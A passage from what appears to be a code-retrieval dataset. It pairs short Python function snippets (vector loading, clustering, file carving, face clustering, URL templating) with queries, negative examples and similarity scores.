words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except OSError:\n print(\"Unable to read word vectors, aborting.\")\n return {}\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)", "def extract_feature_vectors_with_keywords(file, dict, keys):\n f = open(file, 'r')\n num_lines = 0\n\n for line in f:\n if(line.strip()):\n num_lines = num_lines + 1\n\n f.close()\n\n feature_matrix = np.zeros([num_lines, len(dict)])\n\n f = open(file, 'r')\n pos = 0\n\n for line in f:\n if(line.strip()):\n flist = extract_words(line)\n for word in flist:\n if(word in dict):\n if word in keys:\n feature_matrix[pos, dict.index(word)] = 2\n else:\n feature_matrix[pos, dict.index(word)] = 1\n pos = pos + 1\n\n f.close()\n\n return feature_matrix", "def print_vectors(self):\n print(\"Vectors:\")\n for name, vector in self.get_vectors():\n self.print_vector(name, vector.items)", "def exportFlatClusterData(filename, new_row_header,new_column_header,xt,ind1,ind2):\n\n filename = string.replace(filename,'.pdf','.txt')\n export_text = open(filename,'w')\n column_header = string.join(['UID','row_clusters-flat']+new_column_header,'\\t')+'\\n' ### format column-names for export\n export_text.write(column_header)\n column_clusters = string.join(['column_clusters-flat','-']+ map(str, ind2),'\\t')+'\\n' ### format column-flat-clusters for export\n export_text.write(column_clusters)\n\n ### The clusters, dendrogram and flat clusters are drawn bottom-up, so we need to reverse the order to match\n new_row_header = new_row_header[::-1]\n xt = xt[::-1]\n\n ### Export each row in the clustered data matrix xt\n i=0\n for row in xt:\n export_text.write(string.join([new_row_header[i],str(ind1[i])]+map(str, row),'\\t')+'\\n')\n i+=1\n export_text.close()\n\n ### Transpose text file for easier reading!\n oldfile_h = open(filename, 'rb')\n\n elements = [ line.split() for line in oldfile_h ]\n oldfile_h.close()\n\n biglist = []\n for splitline in elements:\n #print len(splitline)\n #print splitline\n biglist.append(splitline)\n newarray = numpy.array(biglist)\n #print numpy.shape(newarray)\n t_array = newarray.transpose()\n #print numpy.shape(t_array)\n #print newarray[:,0]\n\n newfile_h = open(filename[:-4] + \"_transposed.txt\" , 'w')\n for row in t_array:\n #print \"The row is currently: %r\" % row\n newfile_h.write(\"\\t\".join(row) + \"\\n\")\n newfile_h.close()\n\n\n ### Export as CDT file\n filename = string.replace(filename,'.txt','.cdt')\n export_cdt = open(filename,'w')\n column_header = string.join(['UNIQID','NAME','GWEIGHT']+new_column_header,'\\t')+'\\n' ### format column-names for export\n export_cdt.write(column_header)\n eweight = string.join(['EWEIGHT','','']+ ['1']*len(new_column_header),'\\t')+'\\n' ### format column-flat-clusters for export\n export_cdt.write(eweight)\n\n ### Export each row in the clustered data matrix xt\n i=0\n for row in xt:\n export_cdt.write(string.join([new_row_header[i]]*2+['1']+map(str, row),'\\t')+'\\n')\n i+=1\n export_cdt.close()", "def load_vecs():\n global VECTORIZER\n global CECTORIZER\n\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n\n if os.path.isfile(v_file) and os.path.isfile(d_file):\n with open(v_file, 'rb') as f:\n VECTORIZER = pickle.load(f)\n with open(d_file, 'rb') as f:\n CECTORIZER = pickle.load(f)\n return True\n\n return False", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def _compute_util_data(self):\n\n print(\"Computing PCA of document vectors.\")\n self.pca = PCA(n_components = 3)\n\n print(\"Computing document clusters in PCA basis.\")\n inferred_vecs = np.array([self.model.infer_vector(doc.words) for doc in self.tagged_docs])\n self.pca_reduced_vecs = self.pca.fit_transform(inferred_vecs)\n n_clusters = 25 # TODO find way to determine approx cluster size\n self.kmeans = KMeans(init = 'k-means++', n_clusters = n_clusters, random_state = 0)\n self.kmeans_preds = self.kmeans.fit_predict(self.pca_reduced_vecs)", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n print('Dataset has {} nodes, {} edges, {} features.'.format(adj.shape[0], edges.shape[0], features.shape[1]))\n\n return features.todense(), adj, labels", "def eval_cluster_contingency(clustering_alg: List, labels_true, sdist):\n for (alg_name, alg_dict) in clustering_alg:\n if \"alg\" in alg_dict:\n clustering = alg_dict[\"alg\"].fit(sdist)\n labels_pred = clustering.labels_\n alg_dict[\"labels\"] = labels_pred\n else:\n labels_pred = alg_dict[\"labels\"]\n\n pred_label_dict, new_labels = normalize_labels(labels_pred)\n\n alg_dict[\"cm\"] = contingency_matrix(labels_true, new_labels)", "def discover_sectors(path_to_file_under_examination,option):\n\n # Variables #\n\n start_carve_sector, end_carve_sector = [],[]\n current__cluster,_current__cluster = 0,0\n\n # Pointing to file and of file cluster total\n # number calculation\n # Different methods for raw image file\n # or for mounted drive\n\n file = open(path_to_file_under_examination, 'rb')\n\n _clusters_total = int(os.path.getsize(path_to_file_under_examination)/_cluster)\n file.seek(cluster_offset * sector)\n print('Clusters to analyse total:',str(_clusters_total),'...')\n\n # Scanning for headers and footers #\n\n while current__cluster <= _clusters_total:\n\n # This is reading one cluster and then moving\n # the pointer one further cluster\n # This approach will not find\n # NTFS resident files\n # And this will not find ZIP files,\n # which are smaller than a cluster\n # Embedded signature and time-sresponses\n # containing files are appr 13 Kb\n # So they can't really be residents\n # This approach will not find\n # non-contiguously clustered files\n\n try:\n current_cluster = file.read(_cluster)\n except Exception as e:\n return start_carve_sector, end_carve_sector\n\n current__cluster += 1\n\n # This will apply the header #\n\n #header_lenght is the lenghts required for signature to work\n beginning_string_to_analyze = current_cluster[0:header_lenght]\n result = re.search(header_hex_code,beginning_string_to_analyze)\n\n # Action if header is present #\n\n if result:\n if result.group(0):\n \n start_carve_sector.append(int(cluster_offset) # Will\n # remember where file starts\n + clusters_per_sectors * (current__cluster - 1))\n\n _current__cluster = 1\n\n while _current__cluster <= maximum_filesize: # Here is\n # administratively set max lenght\n\n # This will read next cluster and move further one cluster #\n\n current_cluster = file.read(_cluster)\n\n _current__cluster += 1\n current__cluster += 1\n\n # This will apply the footer, first to the whole cluster\n # And second to the tail of the next cluster together with the\n # current cluster\n\n result2 = re.search(footer_hex_code,current_cluster)\n if result2:\n if result2.group(0):\n if option == 'algorithm': # 'Algorithmic' read of flag for tail lenght\n if result2.span()[1] + result2.group(0)[21] + result2.group(0)[20] >= len(current_cluster):\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors)* (current__cluster))\n # result2.group(0)[21] + result2.group(0)[20] are\n # the value of the trailer lenght\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + (clusters_per_sectors)* (current__cluster))\n else:\n if result2.span()[1] == len(current_cluster):\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors)* (current__cluster))\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + (clusters_per_sectors)* (current__cluster))\n\n cluster_tail_2 = file.read(_cluster)[0:sector] #This\n # is additional cluster-read, not the same read\n joined_tail_2 = current_cluster + cluster_tail_2\n result4 = re.search(footer_hex_code,joined_tail_2)\n if result4:\n if result4.group(0):\n if result2 is None:\n if option == 'algorithm': # 'Algorithmic' read of flag for tail lenght\n if result4.span()[1] + result4.group(0)[21] + result4.group(0)[20] >= len(joined_tail_2):\n end_carve_sector.append(int(cluster_offset)\\\n + 2 + (clusters_per_sectors) * (current__cluster))\n # result4.group(0)[21] + result4.group(0)[20] are\n # the value of the trailer lenght\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors) * (current__cluster))\n else:\n if result4.span()[1] == len(joined_tail_2):\n end_carve_sector.append(int(cluster_offset)\\\n + 2 + (clusters_per_sectors) * (current__cluster))\n else:\n end_carve_sector.append(int(cluster_offset)\\\n + 1 + (clusters_per_sectors) * (current__cluster))\n\n file.seek(cluster_offset*sector\n + current__cluster*_cluster)\n\n if result2 or result4:\n break\n destination = path_to_file_under_examination.split('\\\\')[-1]\n print('Scan complete at cluster: ' +str(current__cluster - 1)\\\n + ' ' + str(len(start_carve_sector)) +','\n + str(len(end_carve_sector)) + ' start and end sectors found in '\\\n + destination)\n file.close()\n\n return start_carve_sector,end_carve_sector", "def cfdReadFacesFile(self): \r\n\r\n with open(self.facesFile,\"r\") as fpid:\r\n print('Reading faces file ...')\r\n self.faceNodes=[]\r\n \r\n for linecount, tline in enumerate(fpid):\r\n \r\n if not io.cfdSkipEmptyLines(tline):\r\n continue\r\n \r\n if not io.cfdSkipMacroComments(tline):\r\n continue\r\n \r\n if \"FoamFile\" in tline:\r\n dictionary=io.cfdReadCfdDictionary(fpid)\r\n continue\r\n \r\n if len(tline.split()) ==1:\r\n if \"(\" in tline:\r\n continue\r\n if \")\" in tline:\r\n continue\r\n else:\r\n \r\n self.numberOfFaces = int(tline.split()[0])\r\n continue\r\n \r\n tline=tline.replace(\"(\",\" \")\r\n tline=tline.replace(\")\",\"\")\r\n faceNodesi=[]\r\n for count, node in enumerate(tline.split()):\r\n if count == 0:\r\n continue\r\n #faceNodesi.append(int(node))\r\n else:\r\n faceNodesi.append(float(node))\r\n \r\n self.faceNodes.append(faceNodesi)\r\n \r\n ## (array) with the nodes for each face\r\n self.faceNodes=np.asarray(self.faceNodes)\r\n print(self.faceNodes)", "def evaulate_clusters(self, pred_dict, model_dir):\n\t\tclustering_dict = {\"Topic\":[], \"Text\":[], \"Keywords\": []}\n\t\tfor cluster_num, sents_list in pred_dict.items():\n\t\t\tprint(\"\\n cluster number : \", cluster_num)\n\t\t\tprint(\"\\n number of sents : \", len(sents_list))\n\t\t\ttfidf_vec = TfidfVectorizer(use_idf=True, sublinear_tf=True, max_df=0.8, max_features=20, ngram_range=(1,5), min_df=1)\n\t\t\tX_tfidf = tfidf_vec.fit_transform(sents_list).toarray()\n\t\t\ttotal_tfidf = tfidf_vec.get_feature_names()\n\t\t\tfor sent in sents_list:\n\t\t\t\tclustering_dict[\"Topic\"].append(cluster_num)\n\t\t\t\tclustering_dict[\"Text\"].append(sent)\n\t\t\t\tclustering_dict[\"Keywords\"].append(\",\".join(total_tfidf))\n\t\t\"\"\" save the clusters to csv file \"\"\"\n\t\tdf_dominant_topic = defaultdict(list) \n\t\tdf_dominant_topic[\"Topic\"] = clustering_dict[\"Topic\"]\n\t\tdf_dominant_topic[\"Text\"] = clustering_dict[\"Text\"]\n\t\tdf_dominant_topic[\"Keywords\"] = clustering_dict[\"Keywords\"]\n\t\tdf_dominant_topic = pd.DataFrame(df_dominant_topic)\n\t\tdf_dominant_topic.to_csv(os.path.join(model_dir, \"cluster_sentence_topic_mapping.csv\"))\n\t\treturn df_dominant_topic", "def svm_read_problem(data_file_name):\n\t# From libSVM (http://www.csie.ntu.edu.tw/~cjlin/libsvm/), amended\n\t# to allow for comments at the end of instances (preceded by #) and\n\t# to allow for multi-label instances (labels separated by ',').\n\tprob_y = []\n\tprob_x = []\n\tcomments = []\n\tfor line in open(data_file_name):\n\t\tline = line.split(None, 1)\n\t\t# In case an instance with all zero features\n\t\tif len(line) == 1: line += ['']\n\t\tlabels, features = line\n\t\ttmp = features.split('#')\n\t\tif len(tmp) == 2:\n\t\t\tfeatures = tmp[0].strip()\n\t\t\tcomment = tmp[1].strip()\n\t\telse:\n\t\t\tcomment = None\n\t\txi = {}\n\t\tfor e in features.split():\n\t\t\tind, val = e.split(\":\")\n\t\t\txi[int(ind)] = float(val)\n\t\tprob_y += [(map(float, labels.split(',')))]\n\t\tprob_x += [xi]\n\t\tcomments += [comment]\n\n\treturn (prob_y, prob_x), comments", "def load(self, filename):\n\t\tself.V = np.loadtxt(filename)\n\t\tself.D = self.V.shape[0]-1\n\t\tself.K = self.V.shape[1]\n\t\treturn self", "def cluster_faces_in_video(self):\r\n\r\n logger.debug('Executing people clustering')\r\n\r\n rec_loaded = False\r\n\r\n # Try to load YAML files\r\n if os.path.exists(self.cluster_files_path):\r\n\r\n print 'Loading YAML files with clustering results'\r\n logger.debug('Loading YAML files with clustering results')\r\n\r\n self.recognized_faces = []\r\n for yaml_file in os.listdir(self.cluster_files_path):\r\n yaml_file_path = os.path.join(\r\n self.cluster_files_path, yaml_file)\r\n with open(yaml_file_path) as f:\r\n self.recognized_faces.append(yaml.load(f))\r\n\r\n print 'YAML files with clustering results loaded'\r\n logger.debug('YAML files with clustering results loaded')\r\n\r\n if not rec_loaded:\r\n\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n if os.path.exists(self.track_file_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n logger.debug('Loading YAML file with tracking results')\r\n\r\n with open(self.track_file_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n logger.debug('YAML file with tracking results loaded')\r\n\r\n else:\r\n\r\n print 'Warning! No tracking results found!'\r\n logger.warning('No tracking results found!')\r\n return\r\n\r\n # Make copy of tracked faces\r\n tracking_list = list(self.tracked_faces)\r\n\r\n if ((self.params is not None) and\r\n (ce.FACE_MODELS_DIR_PATH_KEY in self.params)):\r\n if ce.NOSE_POS_FILE_PATH_KEY in self.params:\r\n nose_pos_file_path = self.params[ce.NOSE_POS_FILE_PATH_KEY]\r\n\r\n with open(nose_pos_file_path) as f:\r\n self.nose_pos_list = pk.load(f)\r\n else:\r\n # Save face models\r\n self.save_face_models(tracking_list)\r\n\r\n use_clothing_rec = c.USE_CLOTHING_RECOGNITION\r\n\r\n if ((self.params is not None) and\r\n (c.USE_CLOTHING_RECOGNITION_KEY in self.params)):\r\n use_clothing_rec = self.params[c.USE_CLOTHING_RECOGNITION_KEY]\r\n\r\n if (use_clothing_rec and\r\n ((self.params is None)\r\n or (ce.CLOTH_MODELS_DIR_PATH_KEY not in self.params))):\r\n # Save cloth models\r\n self.save_cloth_models(tracking_list)\r\n\r\n print '\\n\\n### People clustering ###\\n'\r\n logger.debug('\\n\\n### People clustering ###\\n')\r\n\r\n # Save processing time\r\n start_time = cv2.getTickCount()\r\n\r\n self.recognized_faces = []\r\n\r\n # List of segments already analyzed and annotated\r\n ann_segments = []\r\n\r\n model = None\r\n\r\n # Iterate through tracked faces\r\n person_counter = 0\r\n segment_counter = 0\r\n tracked_faces_nr = float(len(tracking_list))\r\n\r\n for tracking_segment_dict in tracking_list:\r\n\r\n self.progress = 100 * (segment_counter / tracked_faces_nr)\r\n\r\n print('progress: ' + str(self.progress) + ' % \\r'),\r\n\r\n if segment_counter not in ann_segments:\r\n\r\n # Save all segments relative\r\n # to one person in person_dict\r\n person_dict = {c.PERSON_COUNTER_KEY: person_counter,\r\n c.ASSIGNED_LABEL_KEY: c.UNDEFINED_LABEL,\r\n c.ASSIGNED_TAG_KEY: c.UNDEFINED_TAG}\r\n\r\n segment_list = []\r\n\r\n segment_dict = {}\r\n\r\n segment_frame_list = tracking_segment_dict[c.FRAMES_KEY]\r\n\r\n segment_dict[c.FRAMES_KEY] = segment_frame_list\r\n\r\n segment_dict[c.ASSIGNED_TAG_KEY] = c.UNDEFINED_TAG\r\n\r\n segment_dict[c.CONFIDENCE_KEY] = 0\r\n\r\n segment_dict[c.SEGMENT_COUNTER_KEY] = segment_counter\r\n\r\n # Start of segment in milliseconds\r\n # of elapsed time in video\r\n\r\n start = tracking_segment_dict[c.SEGMENT_START_KEY]\r\n\r\n segment_dict[c.SEGMENT_START_KEY] = start\r\n\r\n # Duration of segment in milliseconds\r\n\r\n duration = tracking_segment_dict[c.SEGMENT_DURATION_KEY]\r\n\r\n segment_dict[c.SEGMENT_DURATION_KEY] = duration\r\n\r\n if c.ANN_TAG_KEY in tracking_segment_dict:\r\n segment_ann = tracking_segment_dict[c.ANN_TAG_KEY]\r\n segment_dict[c.ANN_TAG_KEY] = segment_ann\r\n\r\n segment_list.append(segment_dict)\r\n\r\n ann_segments.append(segment_counter)\r\n\r\n db_path = os.path.join(\r\n self.face_models_path, str(segment_counter))\r\n\r\n if os.path.isfile(db_path):\r\n\r\n model = cv2.createLBPHFaceRecognizer()\r\n\r\n model.load(db_path)\r\n\r\n if model:\r\n # Use model of this segment\r\n # to recognize faces of remaining segments\r\n\r\n ann_segments = self.search_face(ann_segments,\r\n segment_list, model,\r\n segment_counter)\r\n\r\n # Add segments to person dictionary\r\n\r\n person_dict[c.SEGMENTS_KEY] = segment_list\r\n\r\n # Save total duration of video in milliseconds\r\n\r\n tot_duration = (\r\n self.video_frames * 1000.0 / self.fps)\r\n\r\n person_dict[c.VIDEO_DURATION_KEY] = tot_duration\r\n\r\n self.recognized_faces.append(person_dict)\r\n\r\n person_counter += 1\r\n\r\n segment_counter += 1\r\n\r\n del model\r\n\r\n if not (os.path.exists(self.cluster_path)):\r\n # Create directory for people clustering\r\n os.makedirs(self.cluster_path)\r\n\r\n # Save clustering result in YAML files\r\n\r\n # Remove previous files\r\n if os.path.exists(self.cluster_files_path):\r\n shutil.rmtree(self.cluster_files_path)\r\n # Create directory for people clustering results\r\n os.makedirs(self.cluster_files_path)\r\n\r\n counter = 0\r\n for person_dict in self.recognized_faces:\r\n yaml_file_name = str(counter) + '.YAML'\r\n yaml_file_path = os.path.join(self.cluster_files_path, yaml_file_name)\r\n utils.save_YAML_file(yaml_file_path, person_dict)\r\n counter += 1\r\n\r\n # Save processing time\r\n time_in_clocks = cv2.getTickCount() - start_time\r\n time_in_seconds = time_in_clocks / cv2.getTickFrequency()\r\n\r\n print 'Time for people clustering:', time_in_seconds, 's\\n'\r\n logger.debug('Time for people clustering:', time_in_seconds, 's\\n')\r\n\r\n self.anal_times[c.PEOPLE_CLUSTERING_TIME_KEY] = time_in_seconds\r\n\r\n utils.save_YAML_file(self.analysis_file_path, self.anal_times)\r\n\r\n self.calculate_medoids()" ]
[ "0.5931401", "0.58759993", "0.5818201", "0.5670178", "0.55925786", "0.5564548", "0.5553166", "0.5509292", "0.5509292", "0.5505033", "0.55044186", "0.5498727", "0.5490172", "0.54632276", "0.54203254", "0.54109955", "0.5390733", "0.5373782", "0.5334791", "0.5330502", "0.5268046", "0.5259798", "0.5255289", "0.52416337", "0.52404994", "0.5204905", "0.51949906", "0.519409", "0.5173208", "0.51686245", "0.51533806", "0.5151495", "0.5149693", "0.51421916", "0.5121889", "0.51145023", "0.5101953", "0.5099919", "0.50918823", "0.50875026", "0.5069019", "0.5064608", "0.5057623", "0.50465673", "0.5044908", "0.5042355", "0.5040774", "0.5017224", "0.50071317", "0.49974772", "0.49943087", "0.49847558", "0.4969349", "0.4964818", "0.49591225", "0.49581432", "0.49526477", "0.49440587", "0.49440587", "0.49427685", "0.49403533", "0.493936", "0.49375495", "0.49375495", "0.49310416", "0.4925393", "0.49253583", "0.49225336", "0.49209532", "0.4920655", "0.49084288", "0.49014607", "0.49009246", "0.49004397", "0.48965067", "0.4896159", "0.4894978", "0.4893596", "0.4891116", "0.48888114", "0.48855582", "0.48813677", "0.48755386", "0.4869454", "0.48649126", "0.48579943", "0.48573446", "0.4855975", "0.48515326", "0.48514065", "0.4850051", "0.4849994", "0.484957", "0.48474947", "0.48471946", "0.4842504", "0.48405856", "0.4836688", "0.48299828", "0.482863" ]
0.65529263
0
Make custom attributes and methods to native
def native_methods(self): base_attributes = { *dir(TapiAdapter), *dir(TapiClientExecutor), *dir(JSONAdapterMixin), "serializer", } a = [ attr for attr in dir(self) if not attr.startswith("_") and attr not in base_attributes ] return a
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def attributes(self):\n raise NotImplementedError", "def __attrs_post_init__(self):", "def _set_attributes(self):", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def __setattr__(self, *args, **kwargs): # real signature unknown\n pass", "def attributes(self):\n ...", "def attributes(self):", "def __setattr__(self, attr, value):", "def attr(*args, **kwargs):\n return Attr(*args, **kwargs)", "def __setattr__(*args, **kwargs):\n \n pass", "def __setattr__(*args, **kwargs):\n \n pass", "def __setattr__(self, name, value): # real signature unknown; restored from __doc__\n pass", "def __setattr__(self, name, value): # real signature unknown; restored from __doc__\n pass", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ...", "def __setattr__(self, *args, **kwargs):\n ..." ]
[ "0.6156814", "0.60756165", "0.5929101", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5887519", "0.5865326", "0.5845628", "0.57064074", "0.5687932", "0.5607915", "0.5607915", "0.55993164", "0.55993164", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085", "0.55395085" ]
0.0
-1
Create of url request
def fill_resource_template_url(self, template, params, resource): try: return template.format(**params) except KeyError: all_keys = re.findall(r"{(.[^\}]*)", template) range_not_set_keys = set(all_keys) - set(params.keys()) not_set_keys = "', '".join(range_not_set_keys) raise TypeError( "{}() missing {} required url params: '{}'".format( resource, len(range_not_set_keys), not_set_keys ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_request_url():\n url = 'http'\n if _config['save']:\n url += 's'\n url += '://{}:{}/move'.format(_config['ip'], _config['port'])\n return url", "def _CreateRequest(self, url, data=None):\r\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\r\n req = urllib2.Request(url, data=data, headers={\"Accept\": \"text/plain\"})\r\n if self.host_override:\r\n req.add_header(\"Host\", self.host_override)\r\n for key, value in self.extra_headers.iteritems():\r\n req.add_header(key, value)\r\n return req", "def _CreateRequest(self, url, data=None):\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\n req = urllib2.Request(url, data=data)\n if self.host_override:\n req.add_header(\"Host\", self.host_override)\n for key, value in self.extra_headers.iteritems():\n req.add_header(key, value)\n return req", "def _make_url(self):\n ...", "def _build_request(self, endpoint='', **parameters):\n\n request = {\n 'method': parameters.pop('method', 'GET'),\n 'data': parameters.pop('data', None),\n 'json': parameters.pop('json', None)\n }\n\n # url = {base_url}[/{endpoint}]\n url = '/'.join(filter(None, (self.__class__.base_url, endpoint)))\n\n for index, (key, value) in enumerate(parameters.items()):\n url += '{symbol}{key}={value}'.format(\n symbol='&' if index else '?', key=key, value=value\n )\n\n request['url'] = url\n\n return request", "def urlfor( request, *args, **kwargs ):", "def build_request_url(symbol, start_date, end_date):\n pass", "def createRequest(test, url, headers=None):\n request = HTTPRequest(url=url)\n if headers: request.headers=headers\n test.record(request, HTTPRequest.getHttpMethodFilter())\n return request", "def request(self, url, *args, **kwargs):\n raise 